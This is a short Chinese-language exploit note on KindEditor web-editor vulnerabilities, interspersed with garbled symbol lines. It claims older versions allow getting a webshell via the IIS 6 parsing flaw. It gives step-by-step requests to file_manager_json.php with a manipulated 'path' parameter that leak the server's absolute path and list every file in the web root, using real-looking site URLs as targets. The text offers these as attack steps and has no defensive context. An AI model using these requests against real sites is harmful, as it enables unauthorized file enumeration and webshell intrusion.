影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版)
漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL
, Z; W L1 z* a! Q# ?" a
]$ L% y/ ~( U6 \- M- I
KindEditor列目录漏洞
测试版本:KindEditor 3.4.2 KindEditor 3.5.5
- http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
/ t/ Y$ x3 O) Q6 I
! A$ Y. _' s9 u/ D